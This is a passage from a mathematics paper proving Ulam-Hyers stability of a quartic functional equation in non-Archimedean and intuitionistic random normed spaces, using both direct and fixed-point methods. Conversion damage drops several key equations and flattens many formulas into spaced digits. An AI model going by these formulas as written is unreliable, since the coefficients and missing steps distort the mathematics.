field $K$ with a non-Archimedean non-trivial valuation | · |. A function $||⋅||:X→ [ 0 , ∞ ]$ is called a non-Archimedean norm if it satisfies the following conditions:\n\n1. (i)\n\n||x|| = 0 if and only if x = 0;\n\n2. (ii)\n\nfor any $r∈K$, $x∈X$, ||rx|| = ||r|||x||;\n\n3. 
(iii)\n\nthe strong triangle inequality (ultrametric); namely,\n\n$| | x + y | | ≤ max { | | x | | , | | y | | } ( x , y ∈ X ) .$\n\nThen $( X , | | ⋅ | | )$ is called a non-Archimedean normed space. Due to the fact that\n\n$| | x n - x m | | ≤ max { | | x j + 1 - x j | | : m ≤ j ≤ n - 1 } ( n > m ) ,$\n\na sequence {x n } is Cauchy if and only if {xn+1- xn} converges to zero in a non-Archimedean normed space. By a complete non-Archimedean normed space we mean one in which every Cauchy sequence is convergent.\n\nIn 1897, Hensel discovered the p-adic numbers as a number theoretical analogue of power series in complex analysis. Fix a prime number p. For any non-zero rational number x, there exists a unique integer n x such that $x= a b p n x$, where a and b are integers not divisible by p. Then $|x | p := p - n x$ defines a non-Archimedean norm on Q. The completion of Q with respect to the metric d(x, y) = |x - y| p is denoted by Q p , which is called the p-adic number field.\n\nThroughout the article, we assume that $X$ is a vector space and $Y$ is a complete non-Archimedean normed space.\n\nDefinition 3.1. A non-Archimedean random normed space (briefly, non-Archimedean RN-space) is a triple $( X , μ , T )$, where X is a linear space over a non-Archimedean field $K$, T is a continuous t-norm, and μ is a mapping from X into D+ such that the following conditions hold:\n\n(NA-RN1) μ x (t) = ε0(t) for all t > 0 if and only if x = 0;\n\n(NA-RN2) $μ α x ( t ) = μ x t | α |$ for all $x∈X$, t > 0, α ≠ 0;\n\n(NA-RN3) μx+y(max{t, s}) ≥ T (μ x (t), μ y (s)) for all $x,y,z∈X$ and t, s ≥ 0.\n\nIt is easy to see that if (NA-RN3) holds then so is\n\n(RN3) μx+y(t + s) ≥ T (μ x (t), μ y (s)).\n\nAs a classical example, if $( X , | | . | | )$ is a non-Archimedean normed linear space, then the triple $( X , μ , T M )$, where\n\n$μ x ( t ) = 0 t ≤ | | x | | 1 t > | | x | |$\n\nis a non-Archimedean RN-space.\n\nExample 3.2. Let $( X , | | . | | )$ be is a non-Archimedean normed linear space. Define\n\n$μ x ( t ) = t t + | | x | | , ∀ x ∈ X t > 0 .$\n\nThen $( X , μ , T M )$ is a non-Archimedean RN-space.\n\nDefinition 3.3. Let $( X , μ , T )$ be a non-Archimedean RN-space. Let {x n } be a sequence in $X$. Then {x n } is said to be convergent if there exists $x∈X$ such that\n\n$lim n → ∞ μ x n - x ( t ) = 1$\n\nfor all t > 0. In that case, x is called the limit of the sequence {x n }.\n\nA sequence {x n } in $X$ is called Cauchy if for each ε > 0 and each t > 0 there exists n0 such that for all nn0 and all p > 0 we have $μ x n + p - x n ( t ) >1-ε$.\n\nIf each Cauchy sequence is convergent, then the random norm is said to be complete and the non-Archimedean RN-space is called a non-Archimedean random Banach space.\n\nRemark 3.4. Let $( X , μ , T M )$ be a non-Archimedean RN-space, then\n\n$μ x n + p - x n ( t ) ≥ min { μ x n + j + 1 - x n + j ( t ) : j = 0 , 1 , 2 , … , p - 1 }$\n\nSo, the sequence {x n } is Cauchy if for each ε > 0 and t > 0 there exists n0 such that for all nn0 we have\n\n$μ x n + 1 - x n ( t ) > 1 - ε .$\n\n## 4. Generalized Ulam-Hyers stability for a quartic functional equation in non-Archimedean RN-spaces\n\nLet $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$.\n\nWe investigate the stability of the quartic functional equation\n\nwhere f is a mapping from $X$ to $Y$ and f(0) = 0.\n\nNext, we define a random approximately quartic mapping. 
Let Ψ be a distribution function on $X×X× [ 0 , ∞ ]$ such that Ψ (x, y, ·) is symmetric, nondecreasing and\n\n$Ψ ( c x , c x , t ) ≥ Ψ x , x , t | c | ( x ∈ X , c ≠ 0 ) .$\n\nDefinition 4.1. A mapping $f:X→Y$ is said to be Ψ-approximately quartic if\n\n$μ 1 6 f ( x + 4 y ) + f ( 4 x - y ) - 3 0 6 9 f x + y 3 + f ( x + 2 y ) - 1 3 6 f ( x - y ) + 1 3 9 4 f ( x + y ) - 4 2 5 f ( y ) + 1 5 3 0 f ( x ) ( t ) ≥ Ψ ( x , y , t ) ( x , y ∈ X , t > 0 ) .$\n(4.1)\n\nIn this section, we assume that 4 ≠ 0 in $K$ (i.e., characteristic of $K$ is not 4). Our main result, in this section, is the following:\n\nTheorem 4.2. Let $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$. Let $f:X→Y$ be a Ψ-approximately quartic mapping. If for some α , α > 0, and some integer k, k > 3 with |4k| < α,\n\n$Ψ ( 4 - k x , 4 - k y , t ) ≥ Ψ ( x , y , α t ) ( x ∈ X , t > 0 )$\n(4.2)\n\nand\n\n$lim n → ∞ T j = n ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 ) ,$\n(4.3)\n\nthen there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 | k i$\n(4.4)\n\nfor all x X and t > 0, where\n\n$M ( x , t ) : = T ( Ψ ( x , 0 , t ) , Ψ ( 4 x , 0 , t ) , ⋯ , Ψ ( 4 k - 1 x , 0 , t ) ) ( x ∈ X , t > 0 ) .$\n\nProof. First, we show by induction on j that for each $x∈X$, t > 0 and j ≥ 1,\n\n$μ f ( 4 j x ) - 2 5 6 j f ( x ) ( t ) ≥ M j ( x , t ) : = T ( Ψ ( x , 0 , t ) , ⋯ , Ψ ( 4 j - 1 x , 0 , t ) ) .$\n(4.5)\n\nPutting y = 0 in (4.1), we obtain\n\n$μ f ( 4 x ) - 2 5 6 f ( x ) ( t ) ≥ Ψ ( x , 0 , t ) ( x ∈ X , t > 0 ) .$\n\nThis proves (4.5) for j = 1. Assume that (4.5) holds for some j ≥ 1. Replacing y by 0 and x by 4jx in (4.1), we get\n\n$μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) ≥ Ψ ( 4 j x , 0 , t ) ( x ∈ X , t > 0 ) .$\n\nSince |256| ≤ 1,\n\n$μ f ( 4 j + 1 x ) − 256 j + 1 f ( x ) ( t ) ≥ T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ 256 f ( 4 j x ) − 256 j + 1 f ( x ) ( t ) ) = T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ f ( 4 j x ) − 256 j f ( x ) ( t | 256 | ) ) ≥ T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ f ( 4 j x ) − 256 j f ( x ) ( t ) ) ≥ T ( Ψ ( 4 j x , 0 , t ) , M j ( x , t ) ) = M j + 1 ( x , t )$\n\nfor all $x∈X$. Thus (4.5) holds for all j ≥ 1. In particular\n\n$μ f ( 4 k x ) − 256 k f ( x ) ( t ) ≥ M ( x , t ) ( x ∈ X , t > 0 ) .$\n(4.6)\n\nReplacing x by 4-(kn+k)x in (4.6) and using inequality (4.2), we obtain\n\n(4.7)\n\nThen\n\n$μ ( 4 4 k ) n f ( x ( 4 k ) n ) − ( 4 4 k ) n + 1 f ( x ( 4 k ) n + 1 ) ( t ) ≥ M ( x , α n + 1 | ( 4 4 k ) n | t ) ( x ∈ X , t > 0 , n = 0 , 1 , 2 , … ) .$\n\nHence,\n\n$μ ( 4 4 k ) n f ( x ( 4 k ) n ) − ( 4 4 k ) n + p f ( x ( 4 k ) n + p ) ( t ) ≥ T j = n n + p ( μ ( 4 4 k ) j f ( x ( 4 k ) j ) − ( 4 4 k ) j + p f ( x ( 4 k ) j + p ) ( t ) ) ≥ T j = n n + p M ( x , α j + 1 | ( 4 4 k ) j | t ) ≥ T j = n n + p M ( x , α j + 1 | ( 4 k ) j | t ) ( x ∈ X , t > 0 , n = 0 , 1 , 2 , … ) .$\n\nSince $lim n → ∞ T j = n ∞ M ( x , α j + 1 | ( 4 k ) j | t ) = 1 ( x ∈ X , t > 0 ) , { ( 4 4 k ) n f ( x ( 4 k ) n ) } n ∈ N$, is a Cauchy sequence in the non-Archimedean random Banach space $( Y , μ , T )$. 
Hence, we can define a mapping $Q:X→Y$ such that\n\n$lim n → ∞ μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) = 1 ( x ∈ X , t > 0 ) .$\n(4.8)\n\nNext, for each n ≥ 1, $x∈X$ and t > 0,\n\n$μ f ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) = μ ∑ i = 0 n − 1 ( 4 4 k ) i f ( x ( 4 k ) i ) − ( 4 4 k ) i + 1 f ( x ( 4 k ) i + 1 ) ( t ) ≥ T i = 0 n − 1 ( μ ( 4 4 k ) i f ( x ( 4 k ) i ) − ( 4 4 k ) i + 1 f ( x ( 4 k ) i + 1 ) ( t ) ) ≥ T i = 0 n − 1 M ( x , α i + 1 t | 4 4 k | i ) .$\n\nTherefore,\n\n$μ f ( x ) − Q ( x ) ( t ) ≥ T ( μ f ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) ) ≥ T ( T i = 0 n − 1 M ( x , α i + 1 t | 4 4 k | i ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) ) .$\n\nBy letting n → ∞, we obtain\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 k | i .$\n\nThis proves (4.4).\n\nAs T is continuous, from a well-known result in probabilistic metric space (see e.g., [, Chapter 12]), it follows that\n\n$lim n → ∞ μ ( 4 k ) n ⋅ 16 f ( 4 − k n ( x + 4 y ) ) + ( 4 k ) n f ( 4 − k n ( 4 x − y ) ) − 306 [ ( 4 k ) n ⋅ 9 f ( 4 − k n ( x + y 3 ) ) + ( 4 k ) n f ( 4 − k n ( x + 2 y ) ) ] − 136 ( 4 k ) n f ( 4 − k n ( x − y ) ) + 1394 ( 4 k ) n f ( 4 − k n ( x + y ) ) − 425 ( 4 k ) n f ( 4 − k n y ) + 1530 ( 4 k ) n f ( 4 − k n x ) ( t ) = μ 16 Q ( x + 4 y ) + Q ( 4 x − y ) − 306 [ 9 Q ( x + y 3 ) + Q ( x + 2 y ) ] − 136 Q ( x − y ) + 1394 Q ( x + y ) − 425 Q ( y ) + 1530 Q ( x ) ( t )$\n\nfor almost all t > 0.\n\nOn the other hand, replacing x, y by 4-knx, 4-kny, respectively, in (4.1) and using (NA-RN2) and (4.2), we get\n\n$μ ( 4 k ) n ⋅ 16 f ( 4 − k n ( x + 4 y ) ) + ( 4 k ) n f ( 4 − k n ( 4 x − y ) ) − 306 [ ( 4 k ) n ⋅ 9 f ( 4 − k n ( x + y 3 ) ) + ( 4 k ) n f ( 4 − k n ( x + 2 y ) ) ] − 136 ( 4 k ) n f ( 4 − k n ( x − y ) ) + 1394 ( 4 k ) n f ( 4 − k n ( x + y ) ) − 425 ( 4 k ) n f ( 4 − k n y ) + 1530 ( 4 k ) n f ( 4 − k n x ) ( t ) ≥ Ψ ( 4 − k n x ,4 − k n y , t | 4 k | n ) ≥ Ψ ( x , y , α n t | 4 k | n )$\n\nfor all $x,y∈X$ and all t > 0. Since $lim n → ∞ Ψ x , y , α n t | 4 k | n =1$, we infer that Q is a quartic mapping.\n\nIf $Q ′ :X→Y$ is another quartic mapping such that μQ'(x)-f(x)(t) ≥ M(x, t) for all $x∈X$ and t > 0, then for each n N, $x∈X$ and t > 0,\n\n$μ Q ( x ) − Q ′ ( x ) ( t ) ≥ T ( μ Q ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ′ ( x ) ( t ) , t ) ) .$\n\nThanks to (4.8), we conclude that Q = Q'. □\n\nCorollary 4.3. Let $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$ under a t-norm $T∈H$. Let $f:X→Y$ be a Ψ-approximately quartic mapping. If, for some α , α > 0, and some integer k, k > 3, with |4k| < α,\n\n$Ψ ( 4 - k x , 4 - k y , t ) ≥ Ψ ( x , y , α t ) ( x ∈ X , t > 0 ) ,$\n\nthen there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 | k i$\n\nfor all $x∈X$ and all t > 0, where\n\n$M ( x , t ) : = T ( Ψ ( x , 0 , t ) , Ψ ( 4 x , 0 , t ) , ⋯ , Ψ ( 4 k - 1 x , 0 , t ) ) ( x ∈ X , t > 0 ) .$\n\nProof. Since\n\n$lim n → ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 )$\n\nand T is of Hadžić type, from Proposition 2.1, it follows that\n\n$lim n → ∞ T j = n ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 ) .$\n\nNow we can apply Theorem 4.2 to obtain the result. □\n\nExample 4.4. 
Let $( X , μ , T M )$ non-Archimedean random normed space in which\n\n$μ x ( t ) = t t + | | x | | , ∀ x ∈ X , t > 0 ,$\n\nand $( Y , μ , T M )$ a complete non-Archimedean random normed space (see Example 3.2). Define\n\n$Ψ ( x , y , t ) = t 1 + t .$\n\nIt is easy to see that (4.2) holds for α = 1. Also, since\n\n$M ( x , t ) = t 1 + t ,$\n\nwe have\n\n$lim n → ∞ T M , j = n ∞ M x , α j t | 4 | k j = lim n → ∞ lim m → ∞ T M , j = n m M x , t | 4 | k j (1) = lim n → ∞ lim m → ∞ t t + | 4 k | n (2) = 1 , ∀ x ∈ X , t > 0 . (3) (4)$\n\nLet $f:X→Y$ be a Ψ-approximately quartic mapping. Thus all the conditions of Theorem 4.2 hold and so there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ t t + | 4 k | .$\n\n## 5. Fixed point method for random stability of the quartic functional equation\n\nIn this section, we apply a fixed point method for achieving random stability of the quartic functional equation. The notion of generalized metric space has been introduced by Luxemburg , by allowing the value +∞ for the distance mapping. The following lemma (Luxemburg-Jung theorem) will be used in the proof of Theorem 5.3.\n\nLemma 5.1. . Let (X, d) be a complete generalized metric space and let A : XX be a strict contraction with the Lipschitz constant k such that d(x0, A(x0)) < +∞ for some x0 X. Then A has a unique fixed point in the set Y := {y X, d(x0, y) < ∞} and the sequence (An(x))nNconverges to the fixed point x* for every x Y. Moreover, d(x0, A(x0)) ≤ δ implies $d ( x * , x 0 ) ≤ δ 1 - k$.\n\nLet X be a linear space, (Y, ν, T M ) a complete RN-space and let G be a mapping from X × R into [0, 1], such that G(x, .) D+ for all x. Consider the set E := {g : XY, g(0) = 0} and the mapping d G defined on E × E by\n\nwhere, as usual, inf = +∞. The following lemma can be proved as in :\n\nLemma 5.2. cf. [22, 39] d G is a complete generalized metric on E.\n\nTheorem 5.3. Let X be a real linear space, t f a mapping from X into a complete RN-space (Y, μ , T M ) with f(0) = 0 and let Φ : X2D+ be a mapping with the property\n\n$∃ α ∈ ( 0 , 2 5 6 ) : Φ 4 x , 4 y ( α t ) ≥ Φ x , y ( t ) , ∀ x , y ∈ X , ∀ t > 0 .$\n(5.1)\n\nIf\n\n$μ 1 6 f ( x + 4 y ) + f ( 4 x - y ) - 3 0 6 9 f x + y 3 + f ( x + 2 y ) - 1 3 6 f ( x - y ) + 1 3 9 4 f ( x + y ) - 4 2 5 f ( y ) + 1 5 3 0 f ( x ) ( t ) ≥ Φ x , y ( t ) , ∀ x , y ∈ X ,$\n(5.2)\n\nthen there exists a unique quartic mapping g : XY such that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ Φ x , 0 M t , ∀ x ∈ X , ∀ t > 0 ,$\n(5.3)\n\nwhere\n\n$M = ( 2 5 6 - α ) .$\n\nMoreover,\n\n$g ( x ) = lim n → ∞ f ( 4 n x ) 4 4 n .$\n\nProof. By setting y = 0 in (5.2), we obtain\n\n$μ f ( 4 x ) - 2 5 6 f ( x ) ( t ) ≥ Φ x , 0 ( t )$\n\nfor all x X, whence\n\n$μ 1 2 5 6 f ( 4 x ) - f ( x ) ( t ) = μ 1 2 5 6 ( f ( 4 x ) - 2 5 6 f ( x ) ) ( t ) (1) = μ f ( 4 x ) - 2 5 6 f ( x ) 2 5 6 t (2) ≥ Φ x , 0 2 5 6 t , ∀ x ∈ X , ∀ t > 0 . (3) (4)$\n\nLet\n\n$G ( x , t ) : = Φ x , 0 2 5 6 t .$\n\nConsider the set\n\n$E : = { g : X → Y , g ( 0 ) = 0 }$\n\nand the mapping d G defined on E × E by\n\nBy Lemma 5.2, (E, d G ) is a complete generalized metric space. Now, let us consider the linear mapping J : EE,\n\n$J g ( x ) : = 1 2 5 6 g ( 4 x ) .$\n\nWe show that J is a strictly contractive self-mapping of E with the Lipschitz constant k = α/256.\n\nIndeed, let g, h E be mappings such that d G (g, h) < ε. 
Then\n\n$μ g ( x ) - h ( x ) ( ε t ) ≥ G ( x , t ) , ∀ x ∈ X , ∀ t > 0 ,$\n\nwhence\n\n$μ J g ( x ) - J h ( x ) ( α 2 5 6 ε t ) = μ 1 2 5 6 ( g ( 4 x ) - h ( 4 x ) ) ( α 2 5 6 ε t ) (1) = μ g ( 4 x ) - h ( 4 x ) ( α ε t ) (2) ≥ G ( 4 x , α t ) ( x ∈ X , t > 0 ) . (3) (4)$\n\nSince G(4x, αt) ≥ G(x, t), $μ J g ( x ) - J h ( x ) ( α 2 5 6 ε t ) ≥G ( x , t )$, that is,\n\n$d G ( g , h ) < ε ⇒ d G ( J g , J h ) ≤ α 2 5 6 ε .$\n\nThis means that\n\n$d G ( J g , J h ) ≤ α 2 5 6 d G ( g , h )$\n\nfor all g, h in E.\n\nNext, from\n\n$μ f ( x ) - 1 2 5 6 f ( 4 x ) ( t ) ≥ G ( x , t )$\n\nit follows that d G (f, Jf ) ≤ 1. Using the Luxemburg-Jung theorem, we deduce the existence of a fixed point of J, that is, the existence of a mapping g : XY such that g(4x) = 256g(x) for all x X.\n\nSince, for any x X and t > 0,\n\n$d G ( u , v ) < ε ⇒ μ u ( x ) - v ( x ) ( t ) ≥ G x , t ε ,$\n\nfrom d G (Jnf, g) → 0, it follows that $lim n → ∞ f ( 4 n x ) 4 4 n =g ( x )$ for any x X.\n\nAlso, $d G ( f , g ) ≤ 1 1 - L d ( f , J f )$ implies the inequality $d G ( f , g ) ≤ 1 1 - α 2 5 6$ from which it immediately follows $ν g ( x ) - f ( x ) ( 2 5 6 2 5 6 - α t ) ≥G ( x , t )$ for all t > 0 and all x X. This means that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ G x , 2 5 6 - α 2 5 6 t , ∀ x ∈ X , ∀ t > 0 .$\n\nIt follows that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ Φ x , 0 ( ( 2 5 6 - α ) t ) ∀ x ∈ X , ∀ t > 0 .$\n\nThe uniqueness of g follows from the fact that g is the unique fixed point of J with the property: there is C (0, ∞) such that μg(x)-f(x)(Ct) ≥ G(x, t) for all x X and all t > 0, as desired. □\n\n## 6. Intuitionistic random normed spaces\n\nRecently, the notation of intuitionistic random normed space introduced by Chang et al. . In this section, we shall adopt the usual terminology, notations, and conventions of the theory of intuitionistic random normed spaces as in , , , , , , .\n\nDefinition 6.1. A measure distribution function is a function μ : R → [0, 1] which is left continuous, non-decreasing on R, inftRμ(t) = 0 and suptRμ(t) = 1.\n\nWe will denote by D the family of all measure distribution functions and by H a special element of D defined by\n\n$H ( t ) = 0 , if t ≤ 0 , 1 , if t > 0 .$\n\nIf X is a nonempty set, then μ : XD is called a probabilistic measure on X and μ (x) is\n\ndenoted by μ x .\n\nDefinition 6.2. A non-measure distribution function is a function ν : R → [0, 1] which is right continuous, non-increasing on R, inftRν(t) = 0 and suptRν(t) = 1.\n\nWe will denote by B the family of all non-measure distribution functions and by G a special element of B defined by\n\n$G ( t ) = 1 , if t ≤ 0 , 0 , if t > 0 .$\n\nIf X is a nonempty set, then ν : XB is called a probabilistic non-measure on X and ν (x) is denoted by ν x .\n\nLemma 6.3. , Consider the set L* and operation $≤ L *$ defined by:\n\n$L * = { ( x 1 , x 2 ) : ( x 1 , x 2 ) ∈ [ 0 , 1 ] 2 a n d x 1 + x 2 ≤ 1 } , ( x 1 , x 2 ) ≤ L * ( y 1 , y 2 ) ⇔ x 1 ≤ y 1 , x 2 ≥ y 2 , ∀ ( x 1 , x 2 ) , ( y 1 , y 2 ) ∈ L * .$\n\nThen $( L * , ≤ L * )$ is a complete lattice.\n\nWe denote its units by $0 L * = ( 0 , 1 )$ and $1 L * = ( 1 , 0 )$. In Section 2, we presented classical t-norm. Using the lattice $( L * , ≤ L * )$, these definitions can be straightforwardly extended.\n\nDefinition 6.4. A triangular norm (t-norm) on L* is a mapping $T: ( L * ) 2 → L *$ satisfying the following conditions:\n\n1. (a)\n\n$( ∀ x ∈ L * ) ( T ( x , 1 L * ) = x )$ (boundary condition);\n\n2. (b)\n\n$( ∀ ( x , y ) ∈ ( L * ) 2 ) ( T ( x , y ) = T ( y , x ) )$ (commutativity);\n\n3. 
(c)\n\n$( ∀ ( x , y , z ) ∈ ( L * ) 3 ) ( T ( x , T ( y , z ) ) = T ( T ( x , y ) , z ) )$ (associativity);\n\n4. (d)\n\n(monotonicity).\n\nIf $( L * , ≤ L * , T )$ is an Abelian topological monoid with unit $1 L *$, then $T$ is said to be a continuous t-norm.\n\nDefinition 6.5. A continuous t-norm $T$ on L* is said to be continuous t-representable if there exist a continuous t-norm * and a continuous t-conorm on [0, 1] such that, for all x = (x1, x2), y = (y1, y2) L*,\n\n$T ( x , y ) = ( x 1 * y 1 , x 2 ♢ y 2 ) .$\n\nFor example,\n\n$T ( a , b ) = ( a 1 b 1 , min { a 2 + b 2 , 1 } )$\n\nand\n\n$M ( a , b ) = ( min { a 1 , b 1 } , max { a 2 , b 2 } )$\n\nare continuous t-representable for all a = (a1, a2), b = (b1, b2) L*.\n\nNow, we define a sequence $T n$ recursively by $T 1 =T$ and\n\n$T n ( x ( 1 ) , … , x ( n + 1 ) ) = T ( T n - 1 ( x ( 1 ) , … , x ( n ) ) , x ( n + 1 ) ) , ∀ n ≥ 2 , x ( i ) ∈ L * .$\n\nDefinition 6.6. A negator on L* is any decreasing mapping $N: L * → L *$ satisfying $N ( 0 L * ) = 1 L *$and $N ( 1 L * ) = 0 L *$. If $N ( N ( x ) ) =x$ for all x L*, then $N$ is called an involutive negator. A negator on [0, 1] is a decreasing function N : [0, 1] → [0, 1] satisfying N(0) = 1 and N(1) = 0. N s denotes the standard negator on [0, 1] defined by\n\n$N s ( x ) = 1 - x , ∀ x ∈ [ 0 , 1 ] .$\n\nDefinition 6.7. Let μ and ν be measure and non-measure distribution functions from X × (0, +∞) to [0, 1] such that μ x (t) + ν x (t) ≤ 1 for all x X and t > 0. The triple $( X , P μ , ν , T )$ is said to be an intuitionistic random normed space (briefly IRN-space) if X is a vector space, $T$ is continuous t-representable and $P μ , ν$ is a mapping X × (0, +∞) → L* satisfying the following conditions: for all x, y X and t, s > 0,\n\n1. (a)\n\n$P μ , ν ( x , 0 ) = 0 L *$;\n\n2. (b)\n\n$P μ , ν ( x , t ) = 1 L *$ if and only if x = 0;\n\n3. (c)\n\n$P μ , ν ( α x , t ) = P μ , ν ( x , t | α | )$ for all α ≠ 0;\n\n4. (d)\n\n$P μ , ν ( x + y , t + s ) ≥ L * T ( P μ , ν ( x , t ) , P μ , ν ( y , s ) )$.\n\nIn this case, $P μ , ν$ is called an intuitionistic random norm. Here,\n\n$P μ , ν ( x , t ) = ( μ x ( t ) , ν x ( t ) ) .$\n\nExample 6.8. Let (X, || · ||) be a normed space. Let $T ( a , b ) = ( a 1 b 1 , min ( a 2 + b 2 , 1 ) )$ for all a = (a1, a2), b = (b1, b2) L* and let μ, ν be measure and non-measure distribution functions defined by\n\n$P μ , ν ( x , t ) = ( μ x ( t ) , ν x ( t ) ) = t t + | | x | | , | | x | | t + | | x | | , ∀ t ∈ R + .$\n\nThen $( X , P μ , ν , T )$ is an IRN-space.\n\nDefinition 6.9. (1) A sequence {x n } in an IRN-space $( X , P μ , ν , T )$ is called a Cauchy sequence if, for any ε > 0 and t > 0, there exists an n0 such that\n\n$P μ , ν ( x n - x m , t ) > L * ( N s ( ε ) , ε ) , ∀ n , m ≥ n 0 ,$\n\nwhere N s is the standard negator.\n\n1. (2)\n\nThe sequence {x n } is said to be convergent to a point x X (denoted by$x n → P μ , ν x$) if $P μ , ν ( x n - x , t ) → 1 L *$ as n → ∞ for every t > 0.\n\n2. (3)\n\nAn IRN-space $( X , P μ , ν , T )$ is said to be complete if every Cauchy sequence in X is convergent to a point x X.\n\n## 7. Stability results in intuitionistic random normed spaces\n\nIn this section, we prove the generalized Ulam-Hyers stability of the quartic functional equation in intuitionistic random normed spaces.\n\nTheorem 7.1. Let X be a linear space and let $( X , P μ , ν , T )$ be a complete IRN-space. 
Let f : XY be a mapping with f(0) = 0 for which there are ξ, ζ : X2D+, where ξ (x, y) is denoted by ξx,yand ζ(x, y)is denoted by ζx,y, further, (ξx,y(t), ζx,y(t)) is denoted by Qξ,ζ(x, y, t), with the property:\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * Q ξ , ζ ( x , y , t ) .$\n(7.1)\n\nIf\n\n$T i = 1 ∞ ( Q ξ , ζ ( 4 n + i - 1 x , 0 , 4 4 n + 3 i + 3 t ) ) = 1 L *$\n(7.2)\n\nand\n\n$lim n → ∞ Q ξ , ζ ( 4 n x , 4 n y , 4 4 n t ) = 1 L *$\n(7.3)\n\nfor all x, y X and all t > 0, then there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * T i = 1 ∞ ( Q ξ , ζ ( 4 i - 1 x , 0 , 4 3 i + 3 t ) ) .$\n(7.4)\n\nProof. Putting y = 0 in (7.1), we have\n\n$P μ , ν f ( 4 x ) 2 5 6 - f ( x ) , t ≥ L * Q ξ , ζ ( x , 0 , 4 4 t ) .$\n(7.5)\n\nTherefore, it follows that\n\n$P μ , ν ( f ( 4 k + 1 x ) 4 4 ( k + 1 ) − f ( 4 k x ) 4 4 k , t 4 4 k ) ≥ L * Q ξ , ζ ( 4 k x ,0,4 4 t ) ,$\n(7.6)\n\nwhich implies that\n\n$A μ , ν ( f ( 4 k + 1 x ) 4 4 ( k + 1 ) − f ( 4 k x ) 4 4 k , t ) ≥ L * Q ξ , ζ ( 4 k x ,0,4 4 ( k + 1 ) t ) ,$\n(7.7)\n\nthat is,\n\n$P μ , ν f ( 4 k + 1 x ) 4 4 ( k + 1 ) - f ( 4 k x ) 4 4 k , t 4 k + 1 ≥ L * Q ξ , ζ ( 4 k x , 0 , 4 4 ( k + 1 ) t )$\n(7.8)\n\nfor all k N and all t > 0. As 1 > 1/4 + + 1/4n, from the triangle inequality, it follows\n\n(7.9)\n\nIn order to prove convergence of the sequence ${ f ( 4 n x ) 2 5 6 n }$, replacing x with 4mx in (7.9), we get that for m, n > 0\n\n$P μ , ν ( f ( 4 n + m x ) 2 5 6 ( n + m ) - f ( 4 m x ) 2 5 6 m , t ) ≥ L * T i = 1 n ( Q ξ , ζ ( 4 i + m - 1 x , 0 , 4 3 i + 4 m + 3 t ) ) .$\n(7.10)\n\nSince the right-hand side of the inequality tends 1L*as m tends to infinity, the sequence ${ f ( 4 n x ) 4 4 n }$ is a Cauchy sequence. So we may define $Q ( x ) = lim n → ∞ f ( 4 n x ) 4 4 n$ for all x X.\n\nNow, we show that Q is a quartic mapping. Replacing x, y with 4nx and 4ny, respectively, in (7.1), we obtain\n\n$P μ , ν ( f ( 4 n ( x + 4 y ) ) 256 n + f ( 4 n ( 4 x − y ) ) 256 n − 306 [ 9 f ( 4 n ( x + y 3 ) ) + f ( 4 n ( x + 2 y ) ) 256 n − 136 f ( 4 n ( x − y ) ) 256 n + 1394 f ( 4 n ( x + y ) ) 256 n − 425 f ( 4 n ( y ) ) 256 n + 1530 f ( 4 n ( x ) ) 256 n , t ) ≥ L * Q ξ , ζ ( 4 n x ,4 n y ,4 4 n t ) .$\n(7.11)\n\nTaking the limit as n → ∞, we find that Q satisfies (1.1) for all x, y X.\n\nTaking the limit as n → ∞ in (7.9), we obtain (7.4).\n\nTo prove the uniqueness of the quartic mapping Q subject to (7.4), let us assume that there exists another quartic mapping Q' which satisfies (7.4). Obviously, we have x X and all n . Hence it follows from (7.4) that\n\n$P μ , ν ( Q ( x ) − Q ′ ( x ) , t ) ≥ L * P μ , ν ( Q ( 4 n x ) − Q ′ ( 4 n x ) , 4 4 n t ) ≥ L * T ( P μ , ν ( Q ( 4 n x ) − f ( 4 n x ) , 4 4 n − 1 t ) , P μ , ν ( f ( 4 n x ) − Q ′ ( 4 n x ) , 4 4 n − 1 t ) ) ≥ L * T ( T i = 1 ∞ ( Q ξ , ζ ( 4 n + i − 1 x ,0,4 4 n + 3 i + 3 t ) ) , T i = 1 ∞ ( Q ξ , ζ ( 4 n + i − 1 x ,0,4 4 n + 3 i + 3 t ) )$\n\nfor all x X. By letting n → ∞ in (7.4), we prove the uniqueness of Q. This completes the proof of the uniqueness, as desired. □\n\nCorollary 7.2. Let $( X , P ′ μ ′ , ν ′ , T )$ be an IRN-space and let $( Y , P μ , ν , T )$ be a complete IRN-space. 
